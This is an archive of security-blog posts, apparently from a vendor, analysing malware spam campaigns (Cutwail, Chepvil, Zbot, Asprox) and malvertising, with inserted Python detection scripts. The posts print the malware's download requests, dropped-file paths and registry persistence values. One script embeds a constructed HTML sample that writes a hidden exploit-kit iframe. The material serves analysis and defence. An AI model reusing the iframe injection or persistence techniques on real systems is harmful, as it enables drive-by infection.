Posts Tagged ‘Malware’


Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez  •  February 16th, 2012  •   Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened the message with the attached .HTM file in the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, its default settings fortunately prevented the malicious JavaScript in the HTML source from running. The user would need to click the attachment, or open the HTML file in a browser, for the JavaScript to run.

The image below shows another, more recent spam campaign. This message claims to be an invoice from a random company, with an attached .HTM file posing as the invoice. Here the sample was opened in Microsoft Outlook, and the attachment simply shows the icon of the system's default browser. Again, for the malicious JavaScript to execute, the user has to click the attachment, which launches a browser.


So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the page, the cybercriminal perhaps just being courteous. The second, malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a web page in the same browser window. But this is not an ordinary web page; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugins. On our test machine, the landing page successfully exploited the browser's default PDF reader through the LibTIFF integer overflow vulnerability in Adobe Reader. The exploit went on to download and install malware on our test computer, which at the time of writing was a data-stealing Trojan detected by antivirus under the name Cridex.
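As an added example (not code from the original post), here is a small static triage script for .htm attachments of the kind described above. It pulls out every script block, flags the building blocks this campaign relied on (document.write, unescape, String.fromCharCode, long high-entropy string literals), decodes the literals and reports any iframe target hidden in them; it also reports iframes written in plain HTML, which goes slightly beyond the obfuscated case the post describes. The embedded sample attachment is constructed to mirror the structure described here; the example.invalid URL and the exact script layout are assumptions, not the real landing page.

```python
import math
import re
from urllib.parse import unquote

# Constructed sample modelled on the attachment described above (NOT the real
# spam file): a courteous-looking shell plus a script that unescapes an iframe
# and writes it into the page. The URL is a reserved example domain.
SAMPLE_HTM = """<html><head><title>You are redirecting...</title></head>
<body>Please wait... Loading....
<script>
var p = "%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fkit%2Findex.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E";
document.write(unescape(p));
</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
STRING_RE = re.compile(r'"([^"\n]*)"|\'([^\'\n]*)\'')
CHARCODE_RE = re.compile(r"fromCharCode\(([\d,\s]+)\)")
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*src=[\"']?([^\"'\s>]+)", re.I)

# Calls that legitimate invoices and notifications have no business making.
SUSPICIOUS_CALLS = ("document.write", "unescape(", "eval(", "fromCharCode")


def shannon_entropy(s: str) -> float:
    """Bits per character; long high-entropy literals suggest packed payloads."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def decode_literals(script: str) -> list:
    """Apply the two cheap decodings seen in attachment scripts (URL-escape and
    String.fromCharCode) to the string literals / call arguments in a script."""
    decoded = []
    for a, b in STRING_RE.findall(script):
        literal = a or b
        if "%" in literal:
            decoded.append(unquote(literal))       # unescape("%3C...") equivalent
    for m in CHARCODE_RE.finditer(script):
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def triage_html_attachment(data: str) -> dict:
    """Static triage of an .htm attachment. Returns the iframe targets found and
    the reasons the file was flagged; an empty 'reasons' list means nothing seen."""
    reasons, iframe_targets = [], []
    # Plain, unobfuscated iframes in the markup itself.
    for m in IFRAME_SRC_RE.finditer(data):
        iframe_targets.append(m.group(1))
        reasons.append("inline iframe")
    for script in SCRIPT_RE.findall(data):
        for call in SUSPICIOUS_CALLS:
            if call in script:
                reasons.append(f"script uses {call}")
        for a, b in STRING_RE.findall(script):
            literal = a or b
            if len(literal) >= 40 and shannon_entropy(literal) > 4.0:
                reasons.append(f"high-entropy literal ({len(literal)} chars)")
        for text in decode_literals(script):
            for m in IFRAME_SRC_RE.finditer(text):
                iframe_targets.append(m.group(1))
                reasons.append("decoded script writes an iframe")
    return {"reasons": sorted(set(reasons)), "iframe_targets": iframe_targets}


if __name__ == "__main__":
    print(triage_html_attachment(SAMPLE_HTM))
```

This is triage, not execution: a script that builds its payload through several eval layers will only show up here via the suspicious-call and entropy checks, and the decoded iframe target will be missing. For that case the attachment has to be run in a JavaScript sandbox; the point of the static pass is that it is cheap enough to apply to every .htm attachment at the mail gateway, where the campaign above would have been stopped before any user clicked.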

The landing page that contains the exploit code is served by an exploit kit used by cybercriminals in this spam campaign, the Phoenix Exploit Kit. The kit is readily available for criminals to buy and use; all they need is their own web server capable of running PHP scripts. The image below is a screenshot of the actual server's “Phoenix Exploit's Kit” admin page. The “—” referrer in the statistics suggests that most visitors did NOT arrive from another website but from the HTML files the criminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.


Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.


An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States, overseen by NACHA. Last week, we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “”. As suspected, the malicious attachment was a downloader we have seen a lot of lately: Chepvil.

ACH spam campaign from the Donbot botnet


The Chepvil downloader, unsurprisingly, proceeded to retrieve more than one piece of additional malware. First was the password-stealing malware Zbot, obtained from the domain rattsillis[dot]com with a standard HTTP request for the file “s.exe”, a Zbot variant:

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Cache-Control: no-cache

The file “s.exe” is executed immediately after download and drops the following files on the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a randomly generated domain to reach its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, the executable “22.exe”, from the same domain rattsillis[dot]com:

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 of 45 antivirus programs under various generic names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, about 10 KB in size:

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format KB{6 random digits}.exe:

C:\Documents and Settings\{user}\Application Data\KB117188.exe

The malware then adds an autorun registry value so that it is started again after every reboot:


KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"

After installation, the parent spambot process executes the svchost.exe it dropped in the Windows TEMP folder and then exits.

Instead of listening on a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query for the domain name luis-vuitton-elite[dot]com. If that fails, the bot attempts to connect to a randomly generated domain name instead.


The malware code that attempts to connect to the control server


Once connected, the proxy spambot exchanges control data with the server over port 1001.

Exchange of data between the control server and the spambot


Meanwhile, on port 1002, the spambot receives the actual spam data from the control server and relays it to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.
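As an added example, not part of the original analysis, here is a detection pass over host telemetry for the infection chain described above: a second svchost.exe executed from outside %SystemRoot%\system32, a KB{6 digits}.exe dropped under Application Data, a Run value pointing at it, and a non-mail process talking to ports 1001 and 1002. The events are constructed to match the artifacts listed in the post; the HKCU ...\Run key location is an assumption (the post says only that an autorun key is added), the 203.0.113.7 address is a documentation address rather than the real controller, and the port rule is deliberately the weakest indicator, since 1001/1002 are specific to this one bot.

```python
import re

# Observed control (1001) and spam-relay (1002) ports from the analysis above.
SPAMBOT_PORTS = {1001, 1002}
# Processes expected to make outbound mail-related connections; anything else
# talking to the spambot ports is suspicious.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
# The only place a genuine svchost.exe should ever run from.
LEGIT_SVCHOST = r"c:\windows\system32\svchost.exe"

# Dropped-copy name format from the post: KB{6 random digits}.exe
KB_DROPPER_RE = re.compile(r"^KB\d{6}\.exe$", re.I)
# Run-key location is an ASSUMPTION; the post only says an autorun key is added.
RUN_VALUE_RE = re.compile(r"\\CurrentVersion\\Run\\(?P<name>[^=]+)=(?P<path>.+)$", re.I)
NET_RE = re.compile(r"^(?P<image>\S+)\s+(?P<ip>[\d.]+):(?P<port>\d+)$")

# Constructed telemetry mirroring the artifacts described above (not real logs).
# Each record is (event_kind, payload); 203.0.113.7 is a documentation address.
SAMPLE_EVENTS = [
    ("file_create", r"C:\Documents and Settings\alice\Local Settings\Temp\svchost.exe"),
    ("file_create", r"C:\Documents and Settings\alice\Application Data\KB117188.exe"),
    ("reg_set", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB117188.exe="
                r"C:\Documents and Settings\alice\Application Data\KB117188.exe"),
    ("proc_start", r"C:\Documents and Settings\alice\Local Settings\Temp\svchost.exe"),
    ("net_connect", "svchost.exe 203.0.113.7:1001"),
    ("net_connect", "svchost.exe 203.0.113.7:1002"),
    ("proc_start", r"C:\WINDOWS\system32\svchost.exe"),   # the legitimate service host
    ("net_connect", "outlook.exe 192.0.2.10:25"),          # ordinary mail traffic
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def detect(events) -> list:
    """Return one finding string per matched indicator; [] means nothing seen."""
    findings = []
    for kind, payload in events:
        if kind in ("file_create", "proc_start"):
            name = basename(payload)
            if name.lower() == "svchost.exe" and payload.lower() != LEGIT_SVCHOST:
                findings.append(f"{kind}: svchost.exe outside system32: {payload}")
            elif (kind == "file_create" and KB_DROPPER_RE.match(name)
                  and "\\application data\\" in payload.lower()):
                findings.append(f"file_create: KB-named dropper in Application Data: {payload}")
        elif kind == "reg_set":
            m = RUN_VALUE_RE.search(payload)
            if m and KB_DROPPER_RE.match(m.group("name").strip()):
                findings.append(f"reg_set: Run persistence {m.group('name')} -> {m.group('path')}")
        elif kind == "net_connect":
            m = NET_RE.match(payload)
            if (m and int(m.group("port")) in SPAMBOT_PORTS
                    and m.group("image").lower() not in MAIL_CLIENTS):
                findings.append(f"net_connect: {m.group('image')} -> {m.group('ip')}:{m.group('port')}")
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The svchost-outside-system32 and Run-value rules are the durable ones: they describe how this family persists rather than which domain or port it used this week, so they keep working after the controller moves. The port rule is there to show how the network side of the post would be expressed, but on a real sensor it should be paired with the process lineage (a TEMP-resident svchost.exe started by a KB-named parent) rather than used alone.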

Spam is received by the spambot from the control server and relayed to the recipients.


The command and control server’s IP address is based in Germany:

WHOIS information about the control server


This spambot's recent spamming activity includes both pharmaceutical campaigns and further ACH campaigns that appear to be from , and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much new in this sequence of events: a spammed-out Trojan downloader that triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering, and the best way to protect yourself is to be cautious.


Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing; it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues that it is fake: the message doesn't contain any profile photos, and the recipient's email address has been omitted from the fine print at the bottom.


By contrast, here is a legitimate Facebook friend request.


Clicking the link fetches a web page offering two ways to infect yourself. First, there is a link posing as an Adobe Flash update, through which you can download and install the malware manually. Second, there is a hidden iframe that loads content from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilities on your system, notably in Java.



The malware that is downloaded appears to be a data-stealing Zbot variant (see the VirusTotal report).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.



Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.


Last week malicious spam made up at least 13% of the total spam volume we received, which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet, are mostly recycled spam themes: FedEx, credit card, changelogs and invoices. The malware is attached inside a compressed ZIP archive and is a Trojan that downloads additional malware, including Fake AV, SpyEye and the Cutwail spambot itself.


FedEx spam campaign

Credit Card Blocked spam campaign

Invoice spam campaign

Change Log spam campaign


Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox


The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.


FedEx Spam Seeding New Asprox Binary

By Rodel Mendrez  •  August 28th, 2010  •   Spam

Over the past few days, the Asprox botnet has been spamming out a fake FedEx campaign. We noticed this after our old Asprox binaries downloaded a new, updated “196” version from the bot's command and control server.

This Asprox update is responsible for spamming this week’s FedEx malicious spam campaign.

The attachment in this spam campaign is a downloader Trojan known to some AV products as Oficla or Sasfis. When run, the Trojan retrieves commands from its control server to download the Asprox spambot binary, which in turn sends this FedEx spam campaign. Below is a graphical overview of this campaign.

Asprox spam campaigns come and go. A couple of months ago we blogged about a spam campaign in which the Asprox binary also launched an SQL injection attack targeting ASP websites. A month later it stopped, and the command and control servers became inaccessible. Now it is back again, using the same C&C domain and seeding a new binary. Since the Asprox bot is capable of updating itself on the infected host, our concern is that the next update may launch another round of SQL injection attacks. We will certainly be monitoring it closely.


The impact of just 5 random letters…

By Anonymous  •  January 17th, 2008  •   Malware Vulnerabilities

We have been watching in amazement the impact our latest Malicious Page of the Month had on the industry and media: from coverage at Fox Business News and the Washington Post, all the way to the more “traditional” security outlets such as SecurityFocus and SC Magazine, and bloggers such as Dancho Danchev.

The scary thing is the non-media impact: we are still seeing a tremendous number of domains (and sites) that remain compromised. As a quick preview of the ongoing research we are putting into this, we are getting closer to the root (no pun intended) cause of the problem, which seems to affect Linux web servers (and this time it may not be a cPanel-related issue, for a change).

Looking forward to posting an update soon as we make progress in cracking this one.


And the winner for “top virus” of 2007 is…

By Anonymous  •  January 6th, 2008  •   Cybercrime Malware

Not a virus. Not even malware. Neither is the runner-up… It is the method by which malware is delivered.

According to a report, the most common malware attack of 2007 was the notorious IFRAME.

In our monthly and quarterly reports we provided more in-depth analysis of such top-ranking IFRAME and obfuscated code. In Finjan's terminology, the top-ranked “virus”, IFRAME, is neither malware nor a virus; it is simply how criminals direct users' browsers to malware. Interestingly enough, the runner-up is “Mal/ObfJS”, obfuscated JavaScript: again not a virus or malware but a simple technique for hiding exploits from signature-matching inspection.

How come? Signature-based solutions are in dire need of some way to stop the more common techniques employed by attackers (we actually started reporting on them during 2006), since their detection technology is limited in catching obfuscation and evasion techniques and typically ends up signaturing the de-obfuscating portion of the script.

This has led to the recent reports of false positives by multiple AV vendors: active content is becoming more and more complicated, and the ways to express an action in interpreted code are so numerous that signatures in this realm are almost obsolete. (See the honorary mention of the “DF” function, Mal/FunDF, in 10th place: a signature on a specific de-obfuscating function, with no mention of any malicious action taken by it. It simply had its 15 minutes of fame when toolkits used it to deliver actual malicious code.)

Looking forward to 2008, I really hope that the industry as a whole will not lag behind the attack vectors as it did in 2007, and that new and improved engines will give end users (especially consumers, who do not benefit from the more sophisticated solutions offered to enterprises) better protection when using the internet.

I know what my new-year resolutions are – do you?

Posted by Iftach Amit


SMB Hosting

By Anonymous  •  December 4th, 2007  •   Cybercrime Malware

We have started seeing malware hosted on more “legitimate” hosting sites, the kind that provide easy small-business (SMB) hosting for a low monthly fee.

One of the sites hosting the malware is http://9[REMOVED]o(dot)org/, where a number of executables are located as part of an infection vector:

As can be seen from the VirusTotal scan of one of the files we picked, these are all malicious executables (and pretty new as well; check out the detection rate…).

Looking at the site, it even outright states that it is hosted in a prime hosting location; this is what I call a great reputation!!! It is clear that the attacker has placed the malicious code on a (paid) hosting service that would “legitimize” it, so that it appears benign.

This is just one example; keep an eye on upcoming MCRC publications in the coming month for a full analysis of small-business hosting and of reputation services used for security purposes…

To be continued…

Posted by Ayelet Heyman


Malicious Advertisement (or The Ad that stole the Site)

By Anonymous  •  November 15th, 2007  •   Cybercrime Malware Phishing

Spyware Sucks published a post about a site hijacked by a malicious advertisement. Once loaded, this advertisement redirects the browser (through 3 other domains) to “”, a notorious fake anti-malware program.

Once redirected to the site, the browser window is minimized and a new window opens, showing what seems to be a sophisticated online scan. This is, of course, more scaM than scaN, enticing the user to download malicious software. Keeping in mind that this attack targets not computer experts but normal users reveals its danger: the well-formatted site shows great graphics, misleading the user into thinking his machine is infected. Furthermore, the site continuously opens windows asking the user to approve the installation and won't stop until you kill the browser, in the hope that the user downloads the file just to get rid of the annoying messages.

Another issue is the loss for the original site from which the ad was served. This could have been even more problematic if, for instance, the malicious advertisement had redirected the browser to a phishing site mimicking the original site…

Site owners, choose your Ad provider wisely!

Posted by Golan Yosef
